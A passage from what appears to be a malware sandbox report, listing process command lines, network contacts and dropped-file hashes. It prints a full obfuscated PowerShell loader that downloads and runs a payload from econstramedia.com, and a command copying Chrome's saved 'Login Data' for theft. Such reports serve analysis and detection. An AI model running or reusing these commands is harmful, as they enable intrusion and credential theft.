KloGSkytrSkria tenf ciriKr lkNeweiG.ninCa.adMogohH poo katlTramdbrai, Je.$Zymod RudeOmsvmmarko abd S.tuPenglEnviap lotDragoGus r FabeTheer IndsBomb)Rini ');Eddied $albinism;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aerosoldaasen.Com && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "write 'Mandlige Kannibalismes Scalers Multimate38 Theologised77 Abrico Fibber Mjsom Forhandlersalg Sindssvages Xx Dybels Tarmkanalers Tel Backhaul Malacanthine Reaktionsevnes Pastoralerne handlelammet Chemotherapeuticness104 Fabrikatets Garewaite Atimy Problemomraaderne Mandlige Kannibalismes Scalers Multimate38 Theologised77 Abrico Fibber Mjsom Forhandlersalg Sindssvages Xx Dybels Tarmkanalers Tel Backhaul Malacanthine Reaktionsevnes Pastoralerne handlelammet Chemotherapeuticness104 Fabrikatets Garewaite Atimy Problemomraaderne';If (${host}.CurrentCulture) {$Truncus++;}$Euforisering='SUBsTR';$Euforisering+='ing';Function Bleens($Nedrakkes){$timetalsreduktionens=$Nedrakkes.Length-$Truncus;For( $Ryotwary=4;$Ryotwary -lt $timetalsreduktionens;$Ryotwary+=5){$Mandlige+=$Nedrakkes.$Euforisering.Invoke( $Ryotwary, $Truncus);}$Mandlige;}function Eddied($Handrail){ . ($Gidseltageres) ($Handrail);}$Personifikationers137=Bleens ' MetM DokoImmazFagmi,ryslIntrl Af.aBe,y/Brud5 Rec. eac0Vild ,up(ArusWReceiUs ln ispdStamoNodewF resCogn ,raaNPassT,pgj Stfo1Crib0 St,.Soap0Zi.c;Sind LesiWame.iSludn Nar6Resq4 tla;Refu SystxRavn6Spar4.rug;Skv. AarsrAl.avTil :Indv1Cero2Hold1Lemm.B.ar0Prog) .or TypGMa me G.mcWamakTilhoAnt./For,2Toet0 Fo.1.oin0Tr,d0Udle1Pred0Spyg1Micr UngeF D miHalvr JogeMandfSkolo Kilxfors/ ecu1E.tr2 In 1 rl.Re t0Tamt ';$Affaldsbrser171=Bleens 'RappUknigsGrimeBo drSkri-DdsbAUdvegD,apeBrodnMasttdi.u ';$Theologised77=Bleens 'Bog.h AentFiddtAtalp .nds Mon:Eman/Stng/Ussee H.mcswaroEndenBracsSladt Di,rSoutaLittm None CatdFatuioo.iaSu s.Fod,cGeneoklismor.h/MisdBUrovrKrisn Bude UdvbMancyRokkg Freg ,elesig.rSteriUn.e.D bbmVanvsUnbooSvig ';$Willowiness=Bleens 'Stet> ka ';$Gidseltageres=Bleens 'Eosii fodeResuxTew. ';$Fissens='Mjsom';$Strombus = Bleens ' PhieGlosc SkrhGe uo Af. Seks%G,una synpaffapS,led,ispa Gr tThecaDo t%Clod\SkruABenteMogur SkuoErhvsLiffotrailBesndLoneaAflaaKreds.upeeUndsn Non.AntiC CheoFeasmDest ,oot&Gr,g&Buni OutmeIn rcR,dehStnnoStaa DigetRt b ';Eddied (Bleens ' nc$ ling Ac,lTilbo Coeb undaBiv.l.sta: Un,CU,deoMiset BonaPo inA,ho=Kaza(AvescAerom.rridI.dt Indl/MagecJaco skep$La eS SubtThiur.maaoKr.kmLocobL.ukuUdsksbeto)Angl ');Eddied (Bleens 'Metr$.lfag Syml VedoUnd bCiana ScolVic.:MeshMsal uFaullT qut Quai Elym Wakaforbt ,abe S.i3Broi8.mso=Flet$ PetT Burh shae.yndoTam,l,rivoDev,g,roqiSsl sVoc e CondS ak7Prod7Oms,.Ceras M sp ,eclGloriA,metMel (Balm$SaimWAppliFjerl kralLateoSplewNortiSebanCoffeAmtssG.uns For) Men ');Eddied (Bleens 'Hemi[TornNParaeR iltN,ve.M.gnSTi,eeraffrTricvMu,ri ExocTatoe.issPBisto KoniArkinredet ,alMCapiaS.ymn b sa,illgVatne Knir Tsu]Bacc:Varv: LumSQ.areJordc S,puReshrU ntiSyn,tIne yLumbPK.agrB.gyoT.ixtOveroUnmucEngioFloelMad No,d= Sca cha [WhipNIm.ee atat Men.FusiSUmque.itacLatruAntir Inci By.tA.foy toaPEpi rSoveoBesmtTot o Autc OmboBarolIn,mT Pr yStr.pR seeFoug]F,rt:,ilo:SlgtTUndelBanas an1Blet2Zeuc ');$Theologised77=$Multimate38[0];$Nonmultiple= (Bleens 'dr.a$ negKatel,fflo NumbBjrnaEnchlMisk:DeteUSax hBaf yE,sfrgil lCambi P eg poreF li=AspiN Elaecamiw ys-o,taOUnfrb,ubij.ermeFunkcPiketTurd Ov rSChriyHumpsSnapt FaceNonvm Kul.FyriN ,ndeRekltJoe,. HolWClameBldtbDe eCMarslS ioiDisce ,vinPoget');$Nonmultiple+=$Cotan[1];Eddied ($Nonmultiple);Eddied (Bleens 'Vide$VideURenuh PrayS.itr semlUn,oi ud.g ared,oe. eksH OrleImplaVentd nineFaldrProds C.e[kaut$CrysAHenhfUntifFlora MurlPlend .hisQuo.bRemorSsygsRea.eDe irShi 1Ton.7Sup,1Glau]Soci=Fro,$VictPflj,eInd,r Ti s D poSprinUnc,ia,raf.ouriThank,okaaWintt HepiUnt.oTordnSt.aeDr grDatas Cul1 Sko3Cong7Prte ');$Unto=Bleens ' awk$UdpeUSugnhAccey Ba,rVa.olPyraiRidagForbeEn.e. Mi DSkruoRemaw FernVenalArreo HelaTilbd .ntF ConiAalelMataeTre.(Skot$Sl,mTrrinhSacreMegaoFredlGaaeoBiltg,ordi ertsAegtePa edImpa7 Sol7M.cr,H,rd$Sy.kGK.isa ,ndrP.eae,uglwFosfa holiIsogtSuleeHusu)F.rs ';$Garewaite=$Cotan[0];Eddied (Bleens 'Zoha$Ha,cgIndilMirio lkkbSil.aB jdl arr:CeteWL.pao BiloFolkd St.hFngseS.nswCha,eSp.irArie=Ford(FastTTelee FlasSkamtSyds-CurePSkibaSelvtY erhBrnd Pre,$AdlyGFirsagr.drPinkeTumlwProdaanteiSchitDeadeAar.)gett ');while (!$Woodhewer) {Eddied (Bleens 'Vamo$ForegServllivsoSmilbH,emaRenslLute:PurlGSkr,otensn igaesoppSpktoSohodD tr=Umbr$Mil,tBorerUn.lu refe Mac ') ;Eddied $Unto;Eddied (Bleens 'EfteS EndtUnbia orerGl,stMynd-UninSSmatlCrose Cale.aukpBesk Para4H,da ');Eddied (Bleens 'Di,e$Forkg NullA,tooK,nsbHoveaM,rdlIndd: mpWOutfoBesmoUnc,d .urh FuneD,arwropee,oleroct,=outb( DetTUniceRuins LovtAfsk-undkPRebeaB.sotPhonhUdra To,$ TabGNiv.aOlymrPrimeElsewPresaOrgaiBlovtWogheMa t)indk ') ;Eddied (Bleens 'Al.e$ Regg SkolUniooForgbRingaflukl M s: KakSGloscB odaRev.lDistePreer P.osSk,v=Iacc$ UvigTu.ilJerkoGulnbra taFej l Sti:CresKG,gsa A.bnBr,dnPo.ei GrnbProba nmlMissiIntesTrummE.eneCigascapi+Mynp+bolt%Endr$GabeMAtteu Si l s,stAndeiFab mnd naAtritBagge Kap3 Kom8Tapp. PrecGni oM tiuSkygnPopltinte ') ;$Theologised77=$Multimate38[$Scalers];}$Grafikindhold=298359;$demodulatorers=27193;Eddied (Bleens ' Skr$K ligken.lOogoo DypbR.vaaRevolDia :,onbFAilmoVerdr.owehFje.a AfbnBewidPredlHoroe GarrRemisDeteaTryplPre,g.nde Aage=Lykk IndlG F seU ertDo t-PlayCpolioFjednPaxitO,hoeForfntractAfd In.t$Pe cG.aviaEj.tr F reA ndwUvilaZymoiMartt UnieMale ');Eddied (Bleens 'Beau$conggAngil DaloV.jbbBalnaredil Cit:InteUKonfnPrecw uneiLithsKreshInv fVedhu gral am2Term3Hjem3Nonf Vaad=Snke Kok[ViiiSEndoyBrodsMyrrt itheM nom liz.JenfC N.do .rtn PalvStemeUmorrCelet Kr ]Alle:nest: ValFPlutrsk,ioK.udmbrubBGrana .ins B,geShor6r ar4F,rsSFuldtKan.r CabiJagenO.tagUnme(Py,a$ alF Tr.oHidfr SirhNoira Pr n,ackdBetylSupee AfvrAktisEntra,hadlLandg Ban)hftb ');Eddied (Bleens ' con$ nhegP lilBarwoAp,ebEm,saSnowl Par: ParDM inyClarbkiloe Cryl hipsAden Gri,=Ugem ill[TuliSEnvey CrasbogwtSc.tedambm ,mu.ProsT TareEscaxAntitB,ho. ShiE ,qunSel cLskuoDeted,apyiLgeknPresgSu.a] Gem:Funk:UnbeAKataSAminC,urtIdiabIu fo.frilGTidseRaftt S,eS ultQuarrRegaiTricnsiphg.lka( Bug$ SmaUBo,tnCondwSnici esosDaglhGoldfAppruT.aflInbo2 ag3Poly3Hero)Brea ');Eddied (Bleens ' dde$ alg o.glTrynoPentbPrveaSvinl,dst:TidsaKettlSvinbYmteiAfmrnAlfeiLiths Su.mbec.=T.yl$ KarDMurayGen.b dvie C olovers,ore. KnosAntruDuodbGenlsNon t eslr AssiScannBombgTur,( Wei$ KloGSkytrSkria tenf ciriKr lkNeweiG.ninCa.adMogohH poo katlTramdbrai, Je.$Zymod RudeOmsvmmarko abd S.tuPenglEnviap lotDragoGus r FabeTheer IndsBomb)Rini ');Eddied $albinism;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aerosoldaasen.Com && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
C:\Windows\SysWOW64\autochk.exe
"C:\Windows\SysWOW64\autochk.exe"
C:\Windows\SysWOW64\svchost.exe
"C:\Windows\SysWOW64\svchost.exe"
C:\Windows\SysWOW64\cmd.exe
/c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V
C:\Program Files\Mozilla Firefox\Firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | econstramedia.com | udp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.216.211.103.in-addr.arpa | udp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| US | 8.8.8.8:53 | 168.245.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.x6hk8.com | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.cindcxyshirts.shop | udp |
| US | 104.21.93.64:80 | www.cindcxyshirts.shop | tcp |
| US | 8.8.8.8:53 | 64.93.21.104.in-addr.arpa | udp |
| US | 104.21.93.64:80 | www.cindcxyshirts.shop | tcp |
| US | 104.21.93.64:80 | www.cindcxyshirts.shop | tcp |
| US | 8.8.8.8:53 | www.limbicmindset.com | udp |
| US | 3.33.130.190:80 | www.limbicmindset.com | tcp |
| US | 8.8.8.8:53 | 190.130.33.3.in-addr.arpa | udp |
| US | 3.33.130.190:80 | www.limbicmindset.com | tcp |
| US | 3.33.130.190:80 | www.limbicmindset.com | tcp |
| US | 8.8.8.8:53 | www.vnddq.biz | udp |
| HK | 20.2.168.177:80 | www.vnddq.biz | tcp |
| US | 8.8.8.8:53 | 177.168.2.20.in-addr.arpa | udp |
| HK | 20.2.168.177:80 | www.vnddq.biz | tcp |
| HK | 20.2.168.177:80 | www.vnddq.biz | tcp |
| US | 8.8.8.8:53 | www.clearconceptslearning.com | udp |
| US | 34.149.87.45:80 | www.clearconceptslearning.com | tcp |
| US | 8.8.8.8:53 | 45.87.149.34.in-addr.arpa | udp |
| US | 34.149.87.45:80 | www.clearconceptslearning.com | tcp |
| US | 34.149.87.45:80 | www.clearconceptslearning.com | tcp |
Files
memory/448-2-0x00007FFAA7FA3000-0x00007FFAA7FA5000-memory.dmp
memory/448-3-0x000001D8C0E00000-0x000001D8C0E22000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qknwf5f4.wlw.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/448-13-0x00007FFAA7FA0000-0x00007FFAA8A61000-memory.dmp
memory/448-14-0x00007FFAA7FA0000-0x00007FFAA8A61000-memory.dmp
memory/1984-17-0x000000007522E000-0x000000007522F000-memory.dmp
memory/1984-18-0x00000000024F0000-0x0000000002526000-memory.dmp
memory/1984-19-0x0000000075220000-0x00000000759D0000-memory.dmp
memory/1984-20-0x0000000005140000-0x0000000005768000-memory.dmp
memory/1984-21-0x0000000075220000-0x00000000759D0000-memory.dmp
memory/1984-22-0x0000000004F60000-0x0000000004F82000-memory.dmp
memory/1984-23-0x0000000005000000-0x0000000005066000-memory.dmp
memory/1984-24-0x0000000005070000-0x00000000050D6000-memory.dmp
memory/1984-34-0x00000000057F0000-0x0000000005B44000-memory.dmp
memory/1984-35-0x0000000005EB0000-0x0000000005ECE000-memory.dmp
memory/1984-36-0x0000000005F40000-0x0000000005F8C000-memory.dmp
memory/1984-37-0x00000000077F0000-0x0000000007E6A000-memory.dmp
memory/1984-38-0x00000000063C0000-0x00000000063DA000-memory.dmp
memory/1984-39-0x0000000007210000-0x00000000072A6000-memory.dmp
memory/1984-40-0x0000000007100000-0x0000000007122000-memory.dmp
memory/1984-41-0x0000000008420000-0x00000000089C4000-memory.dmp
C:\Users\Admin\AppData\Roaming\Aerosoldaasen.Com
| MD5 | 0297ce57c232a13444390269f1a9ea8c |
| SHA1 | 718c8339e362670e5ba20bec7f3f81d7ef4caed9 |
| SHA256 | f67a6e89cac1951035fe6d5a477641bb80bf1f3b4c88f4b125e4bf7a15fea679 |
| SHA512 | 6e3d4a24d3591973609296b6a0a2cc563556e225b0fda191a556e3e95ff40305f8692c563e10bce3853f99445f26073364338354c582c3688f6d4fa28aa99527 |
memory/1984-43-0x00000000089D0000-0x000000000A4D0000-memory.dmp
memory/448-44-0x00007FFAA7FA0000-0x00007FFAA8A61000-memory.dmp
memory/448-45-0x00007FFAA7FA3000-0x00007FFAA7FA5000-memory.dmp
memory/1984-53-0x0000000075220000-0x00000000759D0000-memory.dmp
memory/2240-52-0x0000000001200000-0x0000000002D00000-memory.dmp
memory/448-56-0x00007FFAA7FA0000-0x00007FFAA8A61000-memory.dmp
memory/3244-57-0x00000000004A0000-0x00000000004AE000-memory.dmp
memory/3244-60-0x00000000004A0000-0x00000000004AE000-memory.dmp
memory/2240-58-0x0000000001200000-0x0000000002D00000-memory.dmp
memory/3244-61-0x0000000000170000-0x000000000019F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\DB1
| MD5 | a182561a527f929489bf4b8f74f65cd7 |
| SHA1 | 8cd6866594759711ea1836e86a5b7ca64ee8911f |
| SHA256 | 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914 |
| SHA512 | 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558 |
memory/3428-77-0x0000000008AE0000-0x0000000008C43000-memory.dmp
C:\Users\Admin\AppData\Roaming\J104S8QS\J10logri.ini
| MD5 | d63a82e5d81e02e399090af26db0b9cb |
| SHA1 | 91d0014c8f54743bba141fd60c9d963f869d76c9 |
| SHA256 | eaece2eba6310253249603033c744dd5914089b0bb26bde6685ec9813611baae |
| SHA512 | 38afb05016d8f3c69d246321573997aaac8a51c34e61749a02bf5e8b2b56b94d9544d65801511044e1495906a86dc2100f2e20ff4fcbed09e01904cc780fdbad |
C:\Users\Admin\AppData\Roaming\J104S8QS\J10logrf.ini
| MD5 | 2f245469795b865bdd1b956c23d7893d |
| SHA1 | 6ad80b974d3808f5a20ea1e766c7d2f88b9e5895 |
| SHA256 | 1662d01a2d47b875a34fc7a8cd92e78cb2ba7f34023c7fd2639cbb10b8d94361 |
| SHA512 | 909f189846a5d2db208a5eb2e7cb3042c0f164caf437e2b1b6de608c0a70e4f3510b81b85753dbeec1e211e6a83e6ea8c96aff896e9b6e8ed42014473a54dc4f |
C:\Users\Admin\AppData\Roaming\J104S8QS\J10logrg.ini
| MD5 | 4aadf49fed30e4c9b3fe4a3dd6445ebe |
| SHA1 | 1e332822167c6f351b99615eada2c30a538ff037 |
| SHA256 | 75034beb7bded9aeab5748f4592b9e1419256caec474065d43e531ec5cc21c56 |
| SHA512 | eb5b3908d5e7b43ba02165e092f05578f45f15a148b4c3769036aa542c23a0f7cd2bc2770cf4119a7e437de3f681d9e398511f69f66824c516d9b451bb95f945 |
C:\Users\Admin\AppData\Roaming\J104S8QS\J10logrv.ini
| MD5 | bbc41c78bae6c71e63cb544a6a284d94 |
| SHA1 | 33f2c1d9fa0e9c99b80bc2500621e95af38b1f9a |
| SHA256 | ee83c6bcea9353c74bfc0a7e739f3c4a765ace894470e09cdcdebba700b8d4cb |
| SHA512 | 0aea424b57adae3e14ad6491cab585f554b4dffe601b5a17bad6ee6177d2f0f995e419cde576e2d1782b9bddc0661aada11a2c9f1454ae625d9e3223635ec9f4 |
C:\Users\Admin\AppData\Roaming\J104S8QS\J10logim.jpeg
| MD5 | 5293effc66c000f03ef08f79303f02f3 |
| SHA1 | 71ab910b8d8e88db066adf2ed7d66cc01c33d1fa |
| SHA256 | 1f65c99a30a05ab9c513790e59eaba8c00643629692dd794f74b9f0e2373efe7 |
| SHA512 | ff792e81e4fbe29fac826fe92d2ccd15480f43ecb3919d7bb7a33ab155aab75d0e0bcfb72d46ad3fde9d89363d93480a036189e67b45d61585a6de4b0d78915e |